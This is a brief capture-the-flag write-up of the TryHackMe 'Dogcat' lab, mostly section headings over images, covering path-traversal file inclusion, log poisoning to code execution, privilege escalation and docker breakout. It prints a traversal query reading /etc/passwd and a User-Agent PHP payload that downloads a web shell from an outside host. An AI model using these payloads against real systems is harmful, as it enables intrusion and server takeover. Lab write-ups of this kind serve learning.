rootđź’€senseicat:~#

Hack. Eat. Sleep. Repeat!!!


Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham

CTF: TRYHACKME

Lab: Dogcat


image


RECONNAISSANCE

image


LFI Bypass

image

image

image

Understanding the code

Query-:?view=dogs/../../../../etc/passwd&ext=

image


LFI2RCE via log poisoning

image

Code-:"User-Agent: <?php file_put_contents('/var/www/html/shell.php',file_get_contents('http://10.8.158.229:8000/shell2.php')) ?>

image

image


Privesc with env

image

image


Host system’s root privesc through docker breakout

image

image

image

image


THANKS FOR READING!!!